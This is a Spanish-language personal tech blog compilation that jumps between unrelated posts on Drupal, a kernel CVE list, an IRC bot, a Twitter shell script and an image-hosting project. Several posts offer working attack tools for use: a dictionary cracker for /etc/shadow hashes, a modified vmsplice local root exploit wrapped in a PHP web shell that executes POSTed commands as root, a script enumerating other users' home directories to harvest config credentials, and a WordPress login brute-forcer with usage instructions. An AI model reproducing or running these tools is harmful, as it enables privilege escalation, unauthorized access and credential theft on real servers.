Por lo general, esto sucede cuando no existe una capa intermedia entre el archivo y el sistema, sino que se linkea directamente. Algo que debería ser http://www.dominio.cl/sistema/index.php/descargar/949394 es http://www.dominio.cl/sistema/admin/archivos/usuarios_y_passwords.docx, y en el peor de los casos hasta se puede eliminar el nombre del archivo y listar el contenido del directorio “archivos”

Los sistemas web deberían manejar internamente un “id” o nombre ficticio del archivo, hasheado y mapeado al momento de subirlo, para no permitir que cualquier usuario pueda acceder. Por ejemplo, si tenemos la URL de prueba dada anteriormente, 949394 correspondería al ID del archivo, el sistema debería -internamente- hacer una consulta a la base de datos y ver a que archivo corresponde ese ID, luego ver quienes tienen permisos para acceder a ese archivo y, luego de verificar la sesión y permisos, permitir la descarga del archivo.
Para evitar la descarga directa de los archivos, el directorio “uploads” debería estar fuera del directorio de la aplicación, por ejempo, si el directorio de la aplicación es /var/www/html/sistema1/, el directorio debería estar fuera de “sistema1″, sino, aunque hagas todas las validaciones posibles, de todas formas se podrá acceder directamente al archivo saltandose la validación de la aplicación.

¿Por qué Drupal?

Drupal pretende ser mucho más que un gestor de contenidos, lo que busca ser es un gestor de comunidades, un framework para gestionar comunidades, lo que yo llamo CMF. Es extensible, permite la reutilización de código, utilización de templates/themes propios y muchas otras cosas.

¿Por qué NO WordPress, Joomla u otro CMS?

Un CMS, com su nombre lo dice, es un sistema gestor de contenidos, están más orientados a blogs o sitios que no implican una cantidad grande de usuarios y contenido y tipos de contenidos. Lo que yo necesitaba, era un framework para gestionar una comunidad.

¿Se entiende?

El sitio en el que estoy trabajando tiene más de mil usuarios y tiene una cantidad enorme de contenido que se va generando día a día, para esto es necesario algo que me permita gestionarlo y que tenga gran parte del código desarrollado, es decir, que existan plugins o módulos ya hechos y que sólo haga falta modificarlos o adaptarlos a lo que necesitamos. Para Drupal encontramos una serie como por ejemplo el conocido OG:

Organic Groups: Enable users to create and manage their own ‘groups’. Each group can have subscribers, and maintains a group home page where subscribers communicate amongst themselves

Con esto tenemos la posibilidad de que los usuarios creen sus propios grupos, manejen sus suscripciones, creen noticias relacionadas al grupo, privadas o públicas, administración y moderación de grupos, etc.
Tambien es posible crear perfiles personalizados para cada usuario usando el módulo ContentProfile:

Content Profile: is module builds user profiles as content (aka nodes), which opens the opportunity to use all the powerful modules for content for user profiles too, e.g. the Content Construction Kit (CCK).

La creación de módulos propios es bien sencilla, sólo hay que entender cómo trabaja los templates, páginas, nodos, etc. La tarea de creación de módulos se facilita bastante gracias a los hooks, con esto es posible modificar comportamientos de otros módulos (contrib y propios del sistema) y lograr tener un control casi completo del sistema. La idea es, por ningun motivo, tocar el core de Drupal, de lo contrario será muy difícil la mantención del sistema (actualizaciones, etc).
Drupal tambien nos provee de una API, muy completa, la cual podemos trabajar usando las funcionalidades y bondades de Drupal sin tener que usar Drupal -valga la redundancia-. Por ejemplo, hace unos meses tuve que usar sólo el módulo “forum” de Drupal para integrarlo con un sitio que ya estaba desarrollado, ajeno a Drupal. Tambien es muy útil cuando se necesita hacer migración de usuarios y/o contenido de una plataforma a otra. Para usar la API sólo necesitamos descargar el código fuente y tener las siguientes líneas:

(siendo el directorio api dónde tenemos el código fuente de Drupal)

Y listo, ya podemos usar todas las funciones o métodos, variables, constantes, etc.

La versión estable actual de Drupal es la 6, se está trabajando en la 7 que será orientada a objetos. El problema de esto, es que cada vez que se lanza una version nueva (4→5, 5→6, 6→7), los desarrolladores deben volver a programar sus módulos, ya que Drupal no tiene compatibilidad retroactiva.

Links:

Drupal Modules: Repositorio muy completo con distintos módulos para distintas versiones de Drupal .
Documentación de la API

Lectura recomendada:

CVE-2009-0028

    Chris Evans discovered a situation in which a child process can
    send an arbitrary signal to its parent.

CVE-2009-0834

    Roland McGrath discovered an issue on amd64 kernels that allows
    local users to circumvent system call audit configurations which
    filter based on the syscall numbers or argument details.

CVE-2009-0835

    Roland McGrath discovered an issue on amd64 kernels with
    CONFIG_SECCOMP enabled. By making a specially crafted syscall,
    local users can bypass access restrictions.

CVE-2009-0859

    Jiri Olsa discovered that a local user can cause a denial of
    service (system hang) using a SHM_INFO shmctl call on kernels
    compiled with CONFIG_SHMEM disabled. This issue does not affect
    prebuilt Debian kernels.

CVE-2009-1046

    Mikulas Patocka reported an issue in the console subsystem that
    allows a local user to cause memory corruption by selecting a
    small number of 3-byte UTF-8 characters.

CVE-2009-1072

    Igor Zhbanov reported that nfsd was not properly dropping
    CAP_MKNOD, allowing users to create device nodes on file systems
    exported with root_squash.

CVE-2009-1184

    Dan Carpenter reported a coding issue in the selinux subsystem
    that allows local users to bypass certain networking checks when
    running with compat_net=1.

CVE-2009-1192

    Shaohua Li reported an issue in the AGP subsystem they may allow
    local users to read sensitive kernel memory due to a leak of
    uninitialized memory.

CVE-2009-1242

    Benjamin Gilbert reported a local denial of service vulnerability
    in the KVM VMX implementation that allows local users to trigger
    an oops.

CVE-2009-1265

    Thomas Pollet reported an overflow in the af_rose implementation
    that allows remote attackers to retrieve uninitialized kernel
    memory that may contain sensitive data.

CVE-2009-1337

    Oleg Nesterov discovered an issue in the exit_notify function that
    allows local users to send an arbitrary signal to a process by
    running a program that modifies the exit_signal field and then
    uses an exec system call to launch a setuid application.

CVE-2009-1338

    Daniel Hokka Zakrisson discovered that a kill(-1) is permitted to
    reach processes outside of the current process namespace.

CVE-2009-1439

    Pavan Naregundi reported an issue in the CIFS filesystem code that
    allows remote users to overwrite memory via a long
    nativeFileSystem field in a Tree Connect response during mount.

Se publicaron dos exploits para explotar vulnerabildades de escalacion de provilegios local. Estos exploits se aprovechan de la funcion ptrace_attach() para ejecutar un codigo arbitrario que nos permita ejecutar una shell del tipo /bin/sh como root.
El primer exploit es el shoryuken, lo probé en distintas versiones del kernel de debian y archlinux, pudiendo ser explotada solo la version 2.6.26-1-686 de Debian 5.0, de forma aleatoria, es decir, hay veces que ejecuto el exploit y funciona y otras veces no. El segundo script fue probado por su autor en la version del kernel 2.6.29rc1 de Gentoo.
Estos exploits funcionan bajo situaciones especificas y no todos los sistemas son vulnerables.

                                                       #
                                                   sub j(\$){($
                     P,$V)=                      @_;while($$P=~s:^
                 ([()])::x){                    $V+=('('eq$1)?-32:31
           }$V+=ord(  substr(                 $$P,0,1,""))-74} sub a{
          my($I,$K,$  J,$L)=@_               ;$I=int($I*$M/$Z);$K=int(
         $K*$M/$Z);$J=int($J*$M             /$Z);$L=int($L*$M/$Z); $G=$
         J-$I;$F=$L-$K;$E=(abs($          G)>=abs($F))?$G:$F;($E<0) and($
          I,$K)=($J,$L);$E||=.01       ;for($i=0;$i< =abs$E;$i++ ){ $D->{$K
                  +int($i*$F/$E)      }->{$I+int($i*$G/$E)}=1}}sub p{$D={};$
                 Z=$z||.01;map{    $H=$_;$I=$N=j$H;$K=$O=j$H;while($H){$q=ord
                substr($H,0,1,"" );if(42==$q){$J=j$H;$L=j$H}else{$q-=43;$L =$q
              %9;$J=($q-$L)/9;$L=$q-9*$J-4;$J-=4}$J+=$I;$L+=$K;a($I,$K,$J,$ L);
              ($I,$K)=($J,$L)}a($I,$K,$N,$O)}@_;my$T;map{$y=$_;map{ $T.=$D->{$y}
              ->{$_}?$\:' '}(-59..59);$T.="\n"}(-23..23);print"\e[H$T"}$w= eval{
              require Win32::Console::ANSI};$b=$w?'1;7;':"";($j,$u,$s,$t,$a,$n,$o
              ,$h,$c,$k,$p,$e,$r,$l,$C)=split/}/,'Tw*JSK8IAg*PJ[*J@wR}*JR]*QJ[*J'.
               'BA*JQK8I*JC}KUz]BAIJT]*QJ[R?-R[e]\RI'.'}Tn*JQ]wRAI*JDnR8QAU}wT8KT'.
               ']n*JEI*EJR*QJ]*JR*DJ@IQ[}*JSe*JD[n]*JPe*'.'JBI/KI}T8@?PcdnfgVCBRcP'.
                '?ABKV]]}*JWe*JD[n]*JPe*JC?8B*JE};Vq*OJQ/IP['.'wQ}*JWeOe{n*EERk8;'.
                  'J*JC}/U*OJd[OI@*BJ*JXn*J>w]U}CWq*OJc8KJ?O[e]U/T*QJP?}*JSe*JCnTe'.
                   'QIAKJR}*JV]wRAI*J?}T]*RJcJI[\]3;U]Uq*PM[wV]W]WCT*DM*SJ'.  'ZP[Z'.
                      'PZa[\]UKVgogK9K*QJ[\]n[RI@*EH@IddR[Q[]T]T]T3o[dk*JE'.  '[Z\U'.
                        '{T]*JPKTKK]*OJ[QIO[PIQIO[[gUKU\k*JE+J+J5R5AI*EJ00'.  'BCB*'.
                             'DMKKJIR[Q+*EJ0*EK';sub h{$\ = qw(% & @ x)[int    rand
                              4];map{printf  "\e[$b;%dm",int(rand 6)+101-60*   ($w
                               ||0);system(  "cls")if$w ;($A,$S)=    ($_[1],   $
                                _[0]);($M,   @,)= split  '}';for(     $z=256
                                ;$z>0; $z   -=$S){$S*=   $A;p @,}      sleep$_
                                [2];while   ($_[3]&&($    z+=$ S)       < =256){
                                p@,}}("".   "32}7D$j"     ."}AG".       "$u}OG"
                                ."$s}WG"    ."$t",""      ."24}("        ."IJ$a"
                                ."}1G$n"    ."}CO$o"     ."}GG$t"        ."}QC"
                                 ."$h}"      ."^G$e"    ."})IG"          ."$r",
                                 "32}?"       ."H$p}FG$e}QG$r".          "}ZC"
                                 ."$l",          "28}(LC" .""            ."".
                                 "$h}:"           ."J$a}EG".             "$c"
                                 ."}M"             ."C$k}ZG".            "$e"
                                 ."}"             ."dG$r","18"          ."}("
                                ."D;"            ."$C"  )}{h(16         ,1,1,0
                               );h(8,          .98,0,0   );h(16         ,1,1,1)
                               ;h(8.0         ,0.98,0,     1);         redo}###
                             #written                                 060204 by
                           #liverpole                                  @@@@@@@
                        #@@@@@@@@@@@

Para ejecutarlo basta que lo copies y lo pegues en tu editor de texto favorito y lo ejecutes escribiendo perl script.pl. Tambien puedes descargarlo desde acá.

• Distintos niveles de privilegios (administrador, owner de un canal, access de un canal)
• Funcion para realizar busquedas en Google (!google <palabra>)
• Function para buscar definiciones en Google (!define <termino>)
• Distintas funciones de administracion de usuarios (!admin|access add|del|list)
• etc

Algunas de las caracteristicas de este bot es su proteccion anti flood que se define por el owner del canal y el Oráculo (Oracle; término puesto por mi a esta funcionalidad) que permite enseñar al bot definiciones de palabras para luego ser consultadas (!learn palabra significado, ?? palabra).
Este bot corre bajo php-cli (command line interface), es decir, por consola y tambien puede ser ejecutado desde la web. Queda trabajando como un demonio.

Version Actual:
La version actual es la misma desde enero del año 2007, no he vuelto a tocar el codigo (aunque sigo usando el bot), funciona todo menos las busquedas de terminos y definiciones en Google que, me imagino, hay que hacerle un par de modificaciones al codigo para que parsee bien las busquedas.

Changelog

VERSION 1.0.4 – 26 ENE 2007

- Cambiado el sistema de autentifiacion. Se verifica que el usuario
este identificado con NickServ.

VERSION 1.0.3 – 19 ENE 2007

- Se agrego a la clase Bot el metodo TXTflood( … ) que verifica
el flood de texto de un usuario en un canal especifico, esta opcion
puede ser habilitada o desactivada por usuarios con privilegios mediante
!flood on|off en el canal.
- Se ha reescrito la clase que permite la identificacion y permite que los usuarios
tengan distintos privilegios. (CHAdmin.)
- Corregido el bug que expulsaba de manera distinta a !k o !kick (0 nick o [spacio] nick)
- Agregada la clase Google con los metodos !define y !google.

VERSION 1.0.2 – 16 ENE 2007

- El bot corre en segundo plano (fork).
- Agregada una funcion extra en la clase del bot usando el binario ‘numerador’
ubicado en el directorio extras, la funcion es !num NUMERO.
- Fixeado bug que causaba la caida del bot al enviar dos veces el comando
para setear una clave. (reportado por Pons)
- Agregado soporte para unrealircd (antes solo habia sido probado en bahamut).
- Testeado en dancer-ircd, bahamut, Hyperion y unrealircd.

VERSION 1.0.0 – 15 ENE 2007

- Corregido el fallo que cerraba la conexion a la base de datos por idle.

Descargar:
Version 1.0.4: zip | tar.gz | tar.bz2

• Lo que nos interesa es solamente root:$1$xOqq7NEt$vDOA0jbLcaiRbGsj3ddz30.
• Lo que esta antes de “:” corresponde al usuario: root; y lo que sigue es la password.
• Si descomponemos la password podemos obtener:
• $1$: Nos indica que corresponde a una encriptacion md5.
• xOqq7NEt: Es el SALT que se usa para generar el hash del password
  
• vDOA0jbLcaiRbGsj3ddz30.: Es el hash salteado de nuestra password.

Si analizamos todos estos datos podemos darnos cuenta que teniendo el salt podemos encriptar una palabra o frase y generar un hash similar al que estaba en el fichero /etc/shadow, por lo que solo nos queda crear un script y tener un diccionario de palabras a mano para empezar a crackear o descifrar las password en shadow.

El comando mkpasswd nos permite generar un password segun un salt especificado.
Ejemplo:

machine:~$ mkpasswd -H md5 miPassword -S DSfdsdaA
$1$DSfdsdaA$kOxgZsSAshG4W.dgGp28Y/

He creado un script para hacer mas eficiente y automatiza un poco el proceso.

Funcionamiento: Lee palabras desde un fichero y por cada palabra leida genera un hashed and salted password y la compara con los parametros pasados al script.

machine:~$ sh crack.sh DSfdsdaA .NySZJPYFdPr0ETVpMeKx1 wordlist
Cracking .NySZJPYFdPr0ETVpMeKx1 …
Attempts: 161597

Password Cracked.
Decrypted password is: test

Descargar script

root-exploit.diff

1. 51a52
2. > char  *_cmd;
3. 55d55
4. < printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
5. 182,183d181
6. <
7. <       printf("[+] root\n");
8. 185c183,184
9. <       execl("/bin/bash", "bash", "-i", NULL);
10. —
11. >       system(_cmd);
12. >       //execl("/bin/bash", "bash", "-i", NULL);
13. 195a195
14. >       _cmd = argv[1];
15. 202,205d201
16. < printf("———————————–\n");
17. <       printf(" Linux vmsplice Local Root Exploit\n");
18. <       printf(" By qaaz\n");
19. <       printf("———————————–\n");
20. 221,223d216
21. <       printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
22. <       printf("[+] page: 0x%lx\n", pages[0]);
23. <       printf("[+] page: 0x%lx\n", pages[1]);
24. 241,243d233
25. <       printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
26. <       printf("[+] page: 0x%lx\n", pages[2]);
27. <       printf("[+] page: 0x%lx\n", pages[3]);
28. 258,259d247
29. <       printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
30. <       printf("[+] page: 0x%lx\n", pages[4]);
31. 269d256
32. <       printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size)

La modificacion que hago es eliminar todos los printf para que el resultado sea mas limpio ademas, tambien modifico el codigo para que ejecute el comando que nosotros le digamos y luego vuelva a su estado normal.

Demostracion

username@machine:~$ ./root-exploit whoami
root
username@machine:~$

De esta manera podremos programar un sencillo script en php para manipular la maquina vulnerable como se nos de la gana.

1. < ?PHP
2. print "
3. <form action="?" method="post">
4. <input name="cmd" type="text" />
5. <input type="submit" value="eXec!" />
6.  
7. ";
8. if(isset($_POST[‘cmd’]))
9. {
10.    print "<textarea cols="30" rows="120">";
11.    print shell_exec("./root-exploit ".$_POST[‘cmd’]);
12.    print "</textarea>";
13. }
14. ?>

Descargas
Variacion del exploit
Exploit original 1
Exploit original 2

1. #!/bin/sh
2. # Written by Zerial &amp; Pons
3. # McDonald‘s Day …
4. # 21.34, Jun 13 2006 – Updated: 01.41, Jun 15 2006
5. # # # # # # # # # # # # # # # # # # # # # # # # # #
6. #  ____  _      _   _            _
7. # |  _ (_)_ __| | | | __ _  ___| | __
8. # | | | | | ‘__| |_| |/ _` |/ __| |/ /
9. # | |_| | | |  |  _  | (_| | (__|   < # |____/|_|_|  |_| |_|__,_|___|_|_
10. #
11. # # # # # # # # # # # # # # # # # # # # # # # # # #
12. version="1.0.2"
13. if [ $# -lt 2 ]
14. then
15.         echo
16.         echo "DirHack eXploit $version"
17.         echo "This thing will list all sub-home directories"
18.         echo "that are accesable by the user running the"
19.         echo "script."
20.         echo -e "tusage: $0 id output-file bz2|gz|text (default is text)"
21.         echo -e "texample: $0 999 out bz2"
22.         echo
23.         break
24. else
25.         echo > $2
26.         if [ ! -w $2 ]
27.         then
28.                 echo "File $2 doesn’t have write permissions"
29.                 break
30.         fi
31.  
32.         freedirs="public_html public_ftp etc tmp mail"
33.         echo "Starting DirHack $version"
34.         echo "DirHack eXploit $version" >> $2
35.         for dir in $freedirs
36.         do
37.                 for user in `awk -F‘:’ ‘ {printf $1 "n"} ‘ /etc/passwd`
38.                 do
39.                         userhome=`cat /etc/passwd |grep $user: |grep :$(id -u $user): |awk -F‘:’ ‘ {printf $6 "n"}’`
40.                         fulldir=$userhome/$dir
41.                         if [ `id -u $user` -gt $1 ]
42.                         then
43.                                 if [ -d $fulldir ]
44.                                 then
45.                                         echo "" >> $2
46.                                         echo "————————————————————-" >> $2
47.                                         echo "User: $user" >> $2
48.                                         echo "Directory: $fulldir" >> $2
49.                                         echo "Size: `du -sh $fulldir`" >> $2
50.                                         echo "" >> $2
51.                                         ls -Rla $fulldir >> $2
52.                         fi
53.                 fi
54.                 done
55.         done
56.         case $3 in
57.                 bz2)
58.                         bzip2=`which bzip2`
59.                         if [ -x $bzip ]
60.                         then
61.                                 $bzip2 -f $2
62.                                 echo "File ready and compressed in $2.bz2"
63.                         else
64.                                 echo "No exec permissions for bzip2 or bzip2 not found."
65.                                 echo "File left uncompressed in $2"
66.                         fi;;
67.                 gz)
68.                         gzip=`which gzip`
69.                         if [ -x $gzip ]
70.                         then
71.                                 $gzip -f $2
72.                                 echo "File ready and compressed in $2.gz"
73.                         else
74.                                 echo "No exec permissions for gzip or gzip not found."
75.                                 echo "File left uncompressed in $2"
76.                         fi;;
77.  
78.                 *)
79.                         echo "File ready in $2";;
80.  
81.                 esac

Funcionamiento: Lee todos los usuarios desde /etc/passwd y luego, por cada usuario obtenido, ingresa al directorio public_html y lista, recursivamente, todos los directorios y subdirectorios. Generalmente, el usuario en el que corre apache se llama apache y obviamente, debe tener acceso de lectura a todos los directorios y ficheros que se desean mostrar, por ejemplo /home/user/public_html/index.php.

Si no tiene permisos de lectura para apache dificilmente se podria ingresar via web. Muchas veces, estos ficheros tienen permisos de escritura y de lectura y es cuando hay que actuar. Si no encontramos ficheros con permisos de escritura no importa, al menos tenemos acceso para leerlos. Por ejemplo, en los CMS mas populares como WordPress, Joomla, etc. suelen tener un fichero de configuracion con el usuario y clave, en texto plato, de la base de datos con lo que podemos generar un script que nos permita ingresar y/o apoderarnos de esa base de datos.
Este script nos creara un listado, en txt (opcionalmente comprimido en gz o bz), con todos los ficheros y sus permisos, para que podamos indagar en la estructura de directorios.
Una forma de solucionar este problema es con chroot.

Hemos escrito un pequeño programa en PHP que nos permitira hacer post al sistema de login de wordpress probando claves desde un diccionario de palabras.

1. < ?php
2. ini_set("memory_limit", "100M");
3. function crackSite($wordlist, $url, $user, $attemps = 0)
4. {
5.         if($file = file($wordlist))
6.                 print "Read ".count($file)." words.n";
7.         else
8.         {
9.                 print "Can’t read word list file.n";
10.                 die();
11.         }
12.         $i = 0;
13.         rtrim($fields_string,‘&amp;’);
14.         foreach($file as $word)
15.         {
16.                 if(++$i%10 == 0)
17.                         print "Attempts: ".$i."/".count($file)." (".trim($word).")n";
18.                 $fields_string = "log=".$user."&amp;pwd=".trim($word);
19.                 $ch = curl_init();
20.                 curl_setopt($ch,CURLOPT_URL,$url);
21.                 curl_setopt($ch,CURLOPT_POSTFIELDS,$fields_string);
22.                 curl_setopt($ch,CURLOPT_RETURNTRANSFER, true);
23.                 $result = md5( curl_exec($ch) );
24.                 if(!$oresult) $oresult = $result;
25.                 if($oresult != $result)
26.                 {
27.                         print "Password found: ".$word."n";
28.                         die();
29.                 }
30.                 curl_close($ch);
31.         }
32. }
33. crackSite($argv[1], $argv[2], $argv[3]);
34. ?>

Este script esta diseñado para correrlo desde la linea de comandos (php-cli) y su modo de uso es el siguiente:

$ php wp_cracker.php wordlist.txt http://sitio.com/wp-login.php Username

Notese que el script en ningun momento valida datos de entrada y salida, por lo que depende de la persona que lo ejecute que los parametros esten bien. Se ha probado este script con algunos sitios y ha funcionado, puede que para otros sitios sea necesario hacer algunas modificaciones. El primer parametro corresponde al fichero que contiene nuestro diccionario de palabras, el segundo a la URL que el script debe hacer post y el tercero al usuario.
Lo unico que debemos saber es el nombre de usuario que existe en el registro del sitio. Para intentar ingresar a otros sitios es necesario modificar el codigo fuente y cambiar los nombres de los campos.

Requerimientos: Curl y PHP.

Video tutorial:

www.youtube.com/watch?v=CMfxsGQOtd8

Descargar video:
Mirror 1: Hardmodding (2.8M)

La ONI se organiza en Chile bajo los auspicios de la Ilustre Municipalidad de Buin.

El principal objetivo de este proyecto es contribuir a la educación de los jóvenes incorporando la informática como una pieza fundamental en su desarrollo, y además reconocer a aquellos que demuestren talento en el área para orientarlos y apoyarlos en su futura formación.

La ONI se realizará el día 21 de Junio de 14:00 a 18:00 horas en su primera fase en línea y el día 19 de Julio en su fase presencial (y final). Esta última se llevará a cabo en la comuna de Buin. Para la fase presencial, aquellos participantes provenientes de regiones podrán alojarse en Buin con un día de anterioridad.

Los temas a tratar en la ONI son los siguientes:

Estructura de Datos
Algoritmos de Ordenación
Algoritmos de Búsqueda
Grafos
Programación Dinámica
Mínimo Coste
Backtracking

Más info en onibuin

Wiki de tallers en el CDSL

Si alguna vez pensaste en tener un hosting de imágenes corriendo en tu servidor con un script open source que te permite modificarlo como te dé la gana y compartir con personas de todo el mundo esta experiencia… Piensas igual que nosotros.

Con esta frase se presenta el sitio en desarrollo de Chevereto , un futuro sistema libre para el alojamiento de imagenes.

Ya deben conocer Imageshack (http://imageshack.us) o Godlike, el primero un sitio popular a nivel mundial de almacenamiento de imagenes y el segundo un sitio Chileno que a menos de un año de vida se esta popularizando en distintos paises.
Chevereto es un sistema que hace un par de meses se esta desarrollando pero que tambien hace mucho tiempo esta estancado y que ahora retomare con mucho mas animo. Espero poder tener lista una beta del sistema en menos de un mes, junto a Rodolfo Berrios (autor intelectual del asunto) y Pons (un desarrollador desmotivao’).

El sistema contara con varias caracteristicas de gran utilidad, un borrador del ToDo list es el siguiente:

Esta lista contiene en detalle que hace chevereto actualmente en GODLIKE y/o GODLIKE(lite). Esta lista tendra su foco en las comprobaciones de imagen en cuanto a razonamiento mas no en codigo. Esta lista esta en secuencia.

Equema Basico
Toma el archivo (local o remoto) y lo sube a una carpeta temporal > Realiza comprobaciones > Si se sube se mueve de lugar sino es eliminado.

- Setea el Time Zone
- Crea un conditional get (etag)
- Ve si se puede establecer conexion con SQL (caso negativo no permite usar el script).
Formulario
- Si el formulario es enviado y esta vacio: Notificacion.
- Si tiene doble info (se sube local y remota): Notificacion
- Comprueba si se esta subiendo una URL que tenga “godlike.cl” en el apartado del dominio (salvo para las imagenes en /apoyo).
UPLOADING
- Establece un filtro para la subida local (memoria):
– Comprueba la extension, no por mime por que tiene la facultad de corrergir extensiones mal puestas.
– Comprueba si el archivo no supera el maximo permitido.
- Establece un filtro para la subida remota (cURL):
– Conecta y trata de crear una imagen desde la string (asi comprueba) — Aqui deberia comprobar inmediatamente el tamaño:

$filesize = curl_getinfo($uh,CURLINFO_CONTENT_LENGTH_DOWNLOAD);

Pero esta linea no existe. Es una sugerencia

- Pasados estos filtros simples, procede a subir en un directorio temporal.
– Si es local simplemente copia de memoria a carpeta
– Si es remota baja con cURL.
- Procede a crear el MD5 y comprobar en la dB.
- Toma informacion del archivo con statinfo.
– Comprueba mime tipe (de imagenes soportadas, sin importar la extension).
– Toma mime, alto, ancho y peso. Con mime ve si es imagen, con alto y ancho ve si no esta corrupta y con peso denuevo comprueba si no se pasa. Aca seria bueno agregar una lectura de imagesize para determinar colores y cosas x que solo nos dicen si esta corrupta o si alguien le puso .jpg a un .php o algo asi.
- Si el mime es de los tipos soportados y la extension no calza, se la cambia.
- Vamos a la dB y leemos el contador de maximo de archivos por carpeta. Si supera el limite se añade +1 al contador de carpeta y se sube en la carpeta que sige. Esto es para no saturar una sola carpeta con demasiados archivos y pajear el ftp cuando sndamos sapeando.
- Limpiamos el nombre: Conservamos solo alfanumericos con minusculas. – Si el nombre es muy largo cortamos de atras para adelante para mantener la identidad.
– Vemos si existe imagen con ese nombre, de ser asi… Cortamos un poco, denuevo de atras para adelante y añadimos valores aleatorios.
– Volvemos a comprobar… Hasta que sale de ahi.
- Se hace el resimensionamiento si existe. Verifica si no sobrepasa los limites en px (16 y 1280).. Esto deberia hacerlo en el apartado del formulario, pero como el script sube igual a la temporal y le pide al usuario que arregle este error se entiende.
- Revisa si hay solamente numeros en este input, de no ser asi sube a una temporal donde el usuario luego puede arreglar su error.
- Deberia verificar si el tamaño redimensionado no pasa el maximo. Sugerencia.
- Hace el thumb.
- Finalmente, deja de trabajar y mueve a la carpeta definitiva. Añade los contadores de imagen para estadisticas y demas informacion.
- Si pasa algo mal elimina la imagen del directorio temporal de trabajo.

Basicamente eso en lo que es subir imagenes. Notese que la creacion de thums y la de redimensioamiento de imagenes conserva un respeto por las transparencias y la calidad del archivo (usando GD). Aquellas consideraciones las pueden encontrar en el index.php

A todas estas cosas que ya estan implementadas en Godlike, se le sumara el registro de usuarios y personalizacion y administracion subidas por cada usuario. Se corregiran muchas cosas, entre ellas el rendimiento y la carga en el servidor donde este funcionando el sistema. Actualmente esta programado casi de manera secuencial. La idea del nuevo desarrollo de este sistema es que sea completamente orientado a objetos, ayudando a entender y ordenar el codigo y el rendimiento.

Este sistema sera completamente OpenSource y esperamos poder lanzar la primera beta lo antes posible.

Si bien no podre con este script ver los updates de mis contactos, si podre actualizar mis acciones de una manera sencilla sin tener que abrir el navegador web para poder actualizar desde la web o desde twitbin y sin usar ningún cliente para twitter. Es un script sencillo que, configurandolo bien, podra ser muy util.

Para dejarlo funcionando de lujo en fluxbox, la instalacion y configuración paso a paso.
Descargar el script desde acá o copiar el código desde:

#!/bin/sh

CONFIG_FILE=$HOME/.twitshrc

function sendUpdate
{
USERNAME=`grep -v “^#” $CONFIG_FILE |grep username |cut -f2 -d ” “`
PASSWORD=`grep -v “^#” $CONFIG_FILE |grep password |cut -f2 -d ” “`
MY_UPDATE=`zenity –entry –text=”What are you doing now? (140 chars. max)”`
until [ `echo $MY_UPDATE|wc -c` -lt 140 ]; do
zenity –error –text=”Your update has more than 140 characters. Please edit this.”
MY_UPDATE=`zenity –entry –text=”What are you doing now? (140 chars. max)” –entry-text=”$MY_UPDATE”`
done
curl -u “$USERNAME:$PASSWORD” -d “status=$MY_UPDATE” “http://twitter.com/statuses/update.json” |zenity –progress –text=”Sending …” –auto-close auto-kill
}

if [ -f $CONFIG_FILE ];
then
sendUpdate
else
echo “ERROR: Couldn’t open config file ($CONFIG_FILE)”
fi

Como pueden ver en el código, es necesario tener instalado zenity y curl, que nos permitiran interactuar con el script y enviar los datos a twitter.
Es necesario que creemos un fichero de configuracion en el home del usuario que hara uso de este script. Este script se encuentra en el paquete que descargaron, deben copiarlo a su home como $HOME/.twitshrc

cp twitshrc $HOME/.twitshrc

En resumen, los pasos a seguir son:

[zerial@blackwater ~]$ wget http://blog.zerial.org/files/twitsh-0.2.tar.gz
–17:56:13– http://blog.zerial.org/files/twitsh-0.2.tar.gz
=> `twitsh-0.2.tar.gz’
Resolviendo blog.zerial.org… 200.29.4.70
Connecting to blog.zerial.org|200.29.4.70|:80… conectado.
Petición HTTP enviada, esperando respuesta… 200 OK
Longitud: 675 [application/x-gzip]

100%[============================================================================>] 675 –.–K/s

17:56:13 (40.89 MB/s) – `twitsh-0.2.tar.gz’ saved [675/675]

[zerial@blackwater ~]$ tar zxvf twitsh-0.2.tar.gz
twitsh/
twitsh/twitshrc
twitsh/twitter.sh
[zerial@blackwater ~]$ cd twitsh
[zerial@blackwater ~]$ cd twitsh
[zerial@blackwater twitsh]$ ls
twitshrc twitter.sh
[zerial@blackwater twitsh]$ cp twitshrc $HOME/.twitshrc
[zerial@blackwater twitsh]$ su
Contraseña:
[root@blackwater twitsh]# cp twitter.sh /usr/bin/twitsh
[root@blackwater twitsh]# chmod +x /usr/bin/twitsh

Configuramos el fichero $HOME/.twitshrc
Con eso dejamos instalado y listo para usar el script.
Ahora, para hacerlo más simpático junto a fluxbox, editamos el fichero “keys” de flubox, que esta en el directorio .fluxbox de tu home.
Editamos con nuestro editor preferido;

vim $HOME/.fluxbox/keys

Vamos al final y agregamos la linea:

Mod1 s :ExecCommand /usr/bin/twitsh

Mod1 corresponde a la tecla ALT, la letra que lo sige (la s) nos indica que al presionar ALT+S ejecutará dicho comando. Eso lo pueden modificar a su gusto.

Teniendo todo esto hecho, basta con presionar ALT+S y aparecera el dialogo para poder escribir en twitter.

Lo llamé TwitteRead y funciona perfectamente, lo pueden ver al final de la barra de navegacion que esta al costado derecho del blog.
El plugin es bastante basico pero se le pueden ir agregando mas funcionalidades y quizas generar un algoritmo más óptimo para leer los últimos updates de cada usuario, pero para este caso (el mio) basta y sobra con lo que hace. Si en algun momento comienza a fallar entonces reconsideraré la opcion de volver a escribirlo. Si alguien quiere probarlo lo puede descargar desde acá.
Para instalarlo y usarlo es muy sencillo, vayan al directorio de los plugins de wordpress (wp-content/plugins) y desempaqueten el fichero descargado:

$ tar zxvf twitteread-0.5.tar.gz
twitteread/
twitteread/twitteread.php

Luego deben ir al panel de administracion de WP y activen el plugin, una vez activado, deben editar el sidebar del Theme que esten usando y, en la posicion que ustedes quieran, llaman a la funcion que devolvera o mostrara los post en twitter.

<? getTwitterFrom( usuario, cantidad_de_updates ); ?>